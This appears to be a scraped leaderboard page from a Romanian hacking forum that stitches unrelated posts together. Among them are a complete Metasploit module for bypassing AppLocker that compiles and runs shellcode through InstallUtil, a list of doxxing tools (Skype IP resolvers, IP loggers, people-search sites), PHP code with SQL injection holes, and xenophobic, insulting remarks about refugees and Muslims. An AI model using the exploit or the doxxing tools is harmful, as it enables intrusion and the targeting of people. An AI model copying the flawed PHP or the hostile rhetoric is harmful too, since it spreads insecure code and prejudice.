Leaderboard

Nu le mai da Doamne, internet la toti prostii. Pe premiza "uite domne aia au jefuit o baba, ii angajam in politie ca sa nu mai jefuiasca babe".

http://stirileprotv.ro/stiri/actualitate/instanta-suprema-decide-soarta-celui-mai-temut-hacker-roman-de-pe-planeta-7-ani-de-inchisoare-in-tara-sau-50-in-sua.html Ai de pula mea... ratatul asta e numit "cel mai temut hacker roman de pe planeta" @Stealth ai concurenta ba :\

Putea sa faca ceva mai util, sa "sparga" contul de iCloud al Emmei Watson El e cel care a pornit "The fappening" cu Jennifer Lawrence si restul?

Cand a fost conflictul din Ucraina, nu i-am vazut pe aia sa fuga in Romania, Germania, Polonia sau alte tari. Au pus mana pe arma si si-au aparat tara. Statut de refugiat ar trebui sa aiba doar copii, femeile si batranii.

Dupa ce mi-am fixat site-urile mele am zis sa postez si aici ca nu am vazut un thread pe tema asta : DROWN is a serious vulnerability that affects HTTPS and other services that rely on SSL and TLS, some of the essential cryptographic protocols for Internet security. These protocols allow everyone on the Internet to browse the web, use email, shop online, and send instant messages without third-parties being able to read the communication. DROWN allows attackers to break the encryption and read or steal sensitive communications, including passwords, credit card numbers, trade secrets, or financial data. Our measurements indicate 33% of all HTTPS servers are vulnerable to the attack. What can the attackers gain? Any communication between users and the server. This typically includes, but is not limited to, usernames and passwords, credit card numbers, emails, instant messages, and sensitive documents. Under some common scenarios, an attacker can also impersonate a secure website and intercept or change the content the user sees. Who is vulnerable? Websites, mail servers, and other TLS-dependent services are at risk for the DROWN attack, and many popular sites are affected. We used Internet-wide scanning to measure how many sites are vulnerable: More info: https://drownattack.com/ Q&A: https://drownattack.com/#question-answer Paper: https://drownattack.com/#paper Checker: https://drownattack.com/#check

Buna seara! Scriptul cu gifturile a iesit super misto dar m-a dus cu gandul spre alta chestie care mi s-a parut interesanta. Un site rotator cu referal remover si unique ip/site. (cum am ajuns de la gifts la ideea asta nici eu nu stiu, probabil deprivare de somn si multa cofeina) <?php $ip = $_SERVER['REMOTE_ADDR']; $con=mysqli_connect('localhost','*******','********','*********'); $rezultat=array(); $siteuri=array(); $sql = "SELECT siteid FROM user_sites WHERE ip_address = '$ip'"; $result = mysqli_query($con, $sql); while($row = $result->fetch_array(MYSQLI_ASSOC)) {array_push($rezultat, $row["siteid"]);} $sql="SELECT siteid FROM sites"; $result = mysqli_query($con,$sql); while ($row = mysqli_fetch_assoc($result)) {array_push($siteuri, $row["siteid"]);} $final = array_diff($siteuri, $rezultat); $nextvisit = $final[array_rand($final)]; if ( !empty($final)){ $sql = "INSERT INTO user_sites (ip_address, siteid) VALUES ('$ip', '$nextvisit')"; $insertip = mysqli_query($con, $sql); print_r($nextvisit); $sql = "SELECT url FROM sites WHERE siteid = '$nextvisit'"; $result = mysqli_query($con, $sql); while ($row = $result->fetch_assoc()){ $url=$row['url']; } $sql = "UPDATE sites SET visited_today = visited_today + 1 WHERE siteid = $nextvisit"; $result = mysqli_query($con, $sql); $sql = "UPDATE sites SET visited_total = visited_total + 1 WHERE siteid = $nextvisit"; $result = mysqli_query($con, $sql); mysqli_close($con); echo '<a href="'.$url.'" rel="noreferrer" id="autoclick"></a>'; echo "<script>document.getElementById('autoclick').click();</script>"; } else { echo 'No more sites for you!'; } ?> DB sites [siteid] [site_name] [visited_today] [visited_total] usersites [idu] [ip_address] [siteid] Aici am ajuns de m-am dat cu capul de pereti! Sau gresesc eu grav undeva sau array_rand() nu da rezultate tocmai random. De ce spun asta? 90% din vizite s-au dus la primul site dupa cum reiese din statisticile salvate in baza de date. La momentul asta nu imi vine in cap nici un fel de posibila rezolvare, de asta apelez la voi. Multumesc mult! P.S. Va rog sa nu radeti prea tare de mine, cum spuneam si in primul post, sunt incepator in domeniul asta, vreau sa invat, dar dupa o varsta e un pic mai greu.... Daca vedeti erori sau ucruri care se pot imbunatati va rog sa imi spuneti. P.P.S. Evercookie e dementiala ce idee de tracking dar ma intreb daca e si legala din prisma "legislatiei mUE" legata de cookies.

Astazi in drum spre casa, am intrat cu iubita mea putin pe la Zara sa se uite de cate ceva. Ne tot plimba si ne plimbam... la un moment dat m-am plictisit si am iesit putin afara la Aer sa fumez o tigara. Stateam eu si fumam si vad ca la un moment dat ma sunase o veche prietena Megan ma intrebat cum imi mai merge etc.. a trecut timpul mai repede. Si uite asa a terminat si iubita mea cu cumparaturile, ne-am suit in primul taxiu si am mers la mine acasa. Dinou imi suna telefonul era tot ea, ma rugat daca pot sa ii dau numarul lui $!%$#^$%^& ca la sters din greseala din agenda, desigur ca i l-am dat. Mi-a multumit si asta a fost. SPRE CASA! Intrebare : Cine e personajul care lipseste din poveste? PM Rd3zTIevSsytRtNzSIWyRdb1R/R1RZ3rRImxRdWwQZewSt/ySd3rTIm1R/R1RZ3rRZNvRZRuQZbuRtWsRINsSIi5 Au terminat challenge-ul : - Byte-ul

Astia prind mascarici si ii mai dau si la televizor, trebuie sa fii in culmea prostiei sa "spargi" de-al de FBI , NASA , profile de politicieni si etc . Dar din pacate multi dintre voi nu stiti ca totul este un bait bine pus la punct @united7170 multi nu stiu ca exista altceva pe langa facebook si youtube, tu nu stii ca in imperiul prostiei , atunci cand apare cel mai prost este considerat un zeu ? Au mai fost cativa spartani din astia si niciunul nu am auzit sa lucreze la FBI, ba din contra muncesc ori pe la firme de securitate ori prin alte parti sa plateasca "daunele" provocate :D, asa e taranul pune mana pe kali si isi incearca si el norocul fix pe siteuri de genul

Fiecare tara isi primeste partea lor de teroristi care sa le duca planul mai departe alora de sus. De parca atacurile din paris au fost de fatada . Iar cand au fugit in belgia chiar au incercat sa ii opreasca . Stau in belgia am stat la 3 strazi de ala de a fost capu lor iar cand au fost alea 3 zile de grad 3 nu au facut nimic armata statea pe bulevard la Zara si H&M si isi cumparau haine . Era clar ca nu o sa atenteze asupra unei tari in care musulmanii sunt mai multi ca proprii locuitori .Nu sunt un paranoic sau ceva dar nici unu din aia nu sunt refugiati.

## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class Metasploit4 < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Exploit::FileDropper include Msf::Post::File def initialize(info={}) super(update_info(info, 'Name' => 'AppLocker Execution Prevention Bypass', 'Description' => %q{ This module will generate a .NET service executable on the target and utilise InstallUtil to run the payload bypassing the AppLocker protection. Currently only the InstallUtil method is provided, but future methods can be added easily. }, 'License' => MSF_LICENSE, 'Author' => [ 'Casey Smith', # Original AppLocker bypass research 'OJ Reeves' # MSF module ], 'Platform' => [ 'win' ], 'Arch' => [ ARCH_X86, ARCH_X86_64 ], 'SessionTypes' => [ 'meterpreter' ], 'Targets' => [ [ 'Windows', {} ] ], 'DefaultTarget' => 0, 'DisclosureDate'=> 'Aug 3 2015', 'References' => [ ['URL', 'https://gist.github.com/subTee/fac6af078937dda81e57'] ] )) register_options([ OptEnum.new('TECHNIQUE', [true, 'Technique to use to bypass AppLocker', 'INSTALLUTIL', %w(INSTALLUTIL)])]) end # Run Method for when run command is issued def exploit if datastore['TECHNIQUE'] == 'INSTALLUTIL' if payload.arch.first == 'x64' && sysinfo['Architecture'] !~ /64/ fail_with(Failure::NoTarget, 'The target platform is x86. 64-bit payloads are not supported.') end end # sysinfo is only on meterpreter sessions print_status("Running module against #{sysinfo['Computer']}") if not sysinfo.nil? if datastore['TECHNIQUE'] == 'INSTALLUTIL' execute_installutil end end def execute_installutil envs = get_envs('TEMP', 'windir') dotnet_path = get_dotnet_path(envs['windir']) print_status("Using .NET path #{dotnet_path}") cs_path = "#{envs['TEMP']}#{Rex::Text.rand_text_alpha(8)}.cs" exe_path = "#{envs['TEMP']}#{Rex::Text.rand_text_alpha(8)}.exe" installutil_path = "#{dotnet_path}InstallUtil.exe" print_status("Writing payload to #{cs_path}") write_file(cs_path, generate_csharp_source) register_files_for_cleanup(cs_path) print_status("Compiling payload to #{exe_path}") csc_path = "#{dotnet_path}csc.exe" csc_platform = payload.arch.first == 'x86' ? 'x86' : 'x64' vprint_status("Executing: #{csc_path} /target:winexe /nologo /platform:#{csc_platform} /w:0 /out:#{exe_path} #{cs_path}") cmd_exec(csc_path, "/target:winexe /nologo /platform:#{csc_platform} /w:0 /out:#{exe_path} #{cs_path}") print_status("Executing payload ...") vprint_status("Executing: #{installutil_path} /logfile= /LogToConsole=false /U #{exe_path}") client.sys.process.execute(installutil_path, "/logfile= /LogToConsole=false /U #{exe_path}", {'Hidden' => true}) register_files_for_cleanup(exe_path) end def get_dotnet_path(windir) base_path = "#{windir}Microsoft.NETFramework#{payload.arch.first == 'x86' ? '' : '64'}" paths = dir(base_path).select {|p| p[0] == 'v'} dotnet_path = nil paths.reverse.each do |p| path = "#{base_path}#{p}" if directory?(path) && file?("#{path}InstallUtil.exe") dotnet_path = path break end end unless dotnet_path fail_with(Failure::NotVulnerable, '.NET is not present on the target.') end dotnet_path end def generate_csharp_source sc = payload.encoded.each_byte.map {|b| "0x#{b.to_s(16)}"}.join(',') cs = %Q^ using System; namespace Pop { public class Program { public static void Main() { } } [System.ComponentModel.RunInstaller(true)] public class Pop : System.Configuration.Install.Installer { private static Int32 MEM_COMMIT=0x1000; private static IntPtr PAGE_EXECUTE_READWRITE=(IntPtr)0x40; private static UInt32 INFINITE = 0xFFFFFFFF; [System.Runtime.InteropServices.DllImport("kernel32")] private static extern IntPtr VirtualAlloc(IntPtr a, UIntPtr s, Int32 t, IntPtr p); [System.Runtime.InteropServices.DllImport("kernel32")] private static extern IntPtr CreateThread(IntPtr att, UIntPtr st, IntPtr sa, IntPtr p, Int32 c, ref IntPtr id); [System.Runtime.InteropServices.DllImport("kernel32")] private static extern UInt32 WaitForSingleObject(IntPtr h, UInt32 ms); public override void Uninstall(System.Collections.IDictionary s) { byte[] sc = new byte[] {#{sc}}; IntPtr m = VirtualAlloc(IntPtr.Zero, (UIntPtr)sc.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE); System.Runtime.InteropServices.Marshal.Copy(sc, 0, m, sc.Length); IntPtr id = IntPtr.Zero; WaitForSingleObject(CreateThread(id, UIntPtr.Zero, m, id, 0, ref id), INFINITE); } } } ^ cs end end exploit source : packetstormsecurity.com

Daca esti capabil discuta subiectul/topicul si nu omul. Insa e un maaare DACA

Cel mai simplu lucru de pe planeta Pamant si Marte combinat este sa folosesti un CMS, iti arata ca la prosti cum sa il instalezi. De pus plugin-uri si rahaturi inveti de pe net, ca nu s-a nascut nimeni invatat. Nu iti recomand rahaturi d-astea gen weebly, webs, wix, sloboz, pentru ca nu inveti sa faci nimic cu ele. Ar fi bine cand iti faci un site sa si inveti ceva din el. De instalat Wordpress si alte rahaturi gasesti pe net tutoriale cu caruta...

In loc de IP si/sau cookies joaca-te cu asta: http://www.w3schools.com/html/html5_webstorage.asp

Link: https://www.namecheap.com/promos/2016/crazy-88.aspx

Sa fie mai mic sau e ok ?

Aduc acum băieții să-l suie pe FTP 10 inși !

interesanta prezentare! , bun venit nenea

Pentru cei ce lucreaza in domeniu sau pentru curiosi :) 1: Username (Alias) http://namechk.com/ http://knowem.com/ http://www.namecheckr.com/ http://checkusernames.com/ http://usersherlock.com/ https://www.usersearch.org/ 2: Archives https://archive.org/index.php https://www.archive-it.org/ http://aad.archives.gov/aad/series-list.jsp?cat=GS29 3: Social Networks http://www.yasni.com/ http://socialmention.com/ http://www.whostalkin.com/ http://www.linkedin.com/ http://www.formspring.me/ http://foursquare.com/ https://about.me/ https://profiles.google.com/ http://blogger.com https://twitter.com/ http://www.facebook.com/ https://deviantart.com http://xanga.com/ http://tumblr.com/ http://myspace.com/ http://www.photobucket.com/ http://www.quora.com/ http://www.stumbleupon.com/ http://www.reddit.com http://www.digg.com http://www.plixi.com http://pulse.yahoo.com/ http://www.flickr.com/ 4: Phone Numbers http://www.freecellphonedirectorylookup.com http://www.numberway.com/ http://www.fonefinder.net http://www.whitepages.com/reverse-lookup http://www.anywho.com/reverse-lookup http://www.yellowpages.com/reversephonelookup http://www.spydialer.com/ http://www.intelius.com/reverse-phone-lookup.html 5: IP Addresses http://www.infosniper.net/ http://ip-lookup.net/ https://www.whatismyip.com/ip-whois-lookup/ http://whatstheirip.com http://getthierip.com 6: Skype Resolvers http://skypegrab.net/resolver.php http://www.skresolver.com/index.php http://resolvethem.com/ https://www.hanzresolver.com/skype2 https://skype-resolver.org/ http://mostwantedhf.info/ http://orcahub.com/skyperesolver.php https://booter.xyz/skype-resolver/ http://cstress.net/skype-resolver/ http://iskyperesolve.com/ https://ddosclub.com/skype-resolver/index.php 7: Database Search http://skidbase.io/ 8: WHOIS/Website https://www.whois.net/ http://whois.icann.org/en https://who.is/ http://www.whois.com/whois http://www.whois.com/ http://www.statsinfinity.com/ 9: Images http://www.tineye.com/ http://saucenao.com/ http://www.photobucket.com/ https://images.google.com/?gws_rd=ssl 10: IP2Skype http://skypegrab.net/ip2skype.php https://resolvethem.com/ip2skype.php http://www.skresolver.com/ip-to-skype.php http://mostwantedhf.info/ip2skype.php https://www.hanzresolver.com/ip2skype http://skype2ip.ninja/ip2skype.php https://pkresolver.nl/ip2skype.php http://www.chromeresolver.info/IP2Skype.php 11: Email2Skype http://mostwantedhf.info/email.php http://www.skresolver.com/email-to-skype.php https://www.hanzresolver.com/emaillookup https://resolvethem.com/email.php http://freetool.tk/email2skype.php http://skypegrab.net/email2skype.php 12: Skype2Lan http://www.skresolver.com/skype-to-lan.php 13: Skype2Email http://skypegrab.net/skype2email.php https://pkresolver.nl/skype2email.php 14: MAC Address Lookup http://www.coffer.com/mac_find/ http://www.whatsmyip.org/mac-address-lookup/ http://www.macvendorlookup.com/ http://macaddresslookup.org/ http://aruljohn.com/mac.pl 15: Lat/Long http://www.latlong.net/ http://itouchmap.com/latlong.html http://stevemorse.org/jcal/latlon.php 16: EXIF Data http://regex.info/exif.cgi http://exif-viewer.com/ http://metapicz.com/#landing http://www.verexif.com/en/ http://www.findexif.com/ http://www.prodraw.net/online-tool/exif-viewer.php http://exifdata.com/ 17: IP Logger http://grabify.link/ http://blasze.com/ 18: Other http://wink.com/ http://www.abika.com/ http://www.freeality.com/ http://radaris.com/ http://twoogel.com/ http://www.spokeo.com/ http://www.pipl.com/ http://wink.com/ http://www.peekyou.com/ http://yoname.com/ https://www.linkedin.com/ http://search.yahoo.com/ https://google.com/ https://bing.com/ https://reddit.com/ http://www.yellowpagesgoesgreen.org/ http://aad.archives.gov/aad/series-list.jsp?cat=GS29 http://www.numberway.com/uk/ https://www.vinelink.com/vinelink/initMap.do http://www.jailbase.com/en/sources/fl-lcso/ http://publicrecords.onlinesearches.com/ https://www.Intelius.com/ http://www.zoominfo.com/s/#search http://skipease.com/ https://www.advancedbackgroundchecks.com http://www.PublicRecordsNow.com

ce rasist imputit esti ,sa traiesti si tu viata lor si dupaia comentezi ,si zici de parca ai avea tu grija de saracii nostri